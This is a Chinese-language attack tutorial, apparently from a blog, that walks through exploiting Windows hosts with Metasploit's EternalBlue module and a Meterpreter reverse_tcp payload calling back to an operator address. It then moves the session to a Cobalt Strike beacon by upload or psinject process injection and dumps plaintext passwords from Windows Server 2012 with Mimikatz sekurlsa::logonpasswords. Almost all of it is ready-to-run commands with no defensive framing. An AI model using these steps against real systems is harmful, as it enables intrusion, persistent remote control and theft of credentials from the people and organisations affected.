Cobalt Strike与Metasploit Framework权限传递
Cobalt Strike和Metasploit Framework可以通过以下步骤进行权限传递:
-
建立会话:
- 在Metasploit中使用漏洞利用模块(exploit)获取目标系统的会话(session)。
例如:use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <target_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <your_ip> run
- 在Metasploit中使用漏洞利用模块(exploit)获取目标系统的会话(session)。
-
会话转移到Cobalt Strike:
在Metasploit中获取会话后,可以通过以下步骤转移该会话到Cobalt Strike:
在Cobalt Strike中生成一个反向TCP Beacon Payload。
在Metasploit中使用meterpreter
会话,将Cobalt Strike生成的Payload注入到目标系统中以建立Cobalt Strike Beacon。meterpreter> upload <cobalt_strike_beacon_payload> meterpreter> execute -f <cobalt_strike_beacon_payload>
或者直接通过
psinject
模块将Cobalt Strike的Beacon注入到运行的进程中。meterpreter> psinject <pid> <cobalt_strike_beacon_payload>
使用Mimikatz抓取Windows Server 2012明文密码
Mimikatz是一个强大的工具,可以在Windows系统上提取明文密码、哈希、PIN码等。以下是在Windows Server 2012上使用Mimikatz抓取明文密码的步骤:
-
获取系统权限:
首先,确保你在目标系统上具有管理员权限或SYSTEM权限。 -
下载并运行Mimikatz:
将Mimikatz上传到目标系统并使用管理员权限执行它。meterpreter> upload mimikatz.exe meterpreter> execute -f mimikatz.exe -i
-
Dump密码:
在Mimikatz命令行中,使用以下命令抓取明文密码:privilege::debug sekurlsa::logonpasswords
示例操作
假设我们已经使用Metasploit获取了目标系统的Meterpreter会话,并且需要将会话转移到Cobalt Strike,然后使用Mimikatz抓取明文密码。
-
在Metasploit中获取会话:
msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100 msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.200 msf5 exploit(windows/smb/ms17_010_eternalblue) > run
-
将会话转移到Cobalt Strike:
在Cobalt Strike中生成Beacon Payload。
上传并执行Payload,实现会话转移。 -
使用Mimikatz抓取明文密码:
在Cobalt Strike的Beacon中,上传并执行Mimikatz。beacon> upload mimikatz.exe beacon> shell mimikatz.exe
- 在Mimikatz中执行抓取密码的命令:
mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords
- 在Mimikatz中执行抓取密码的命令: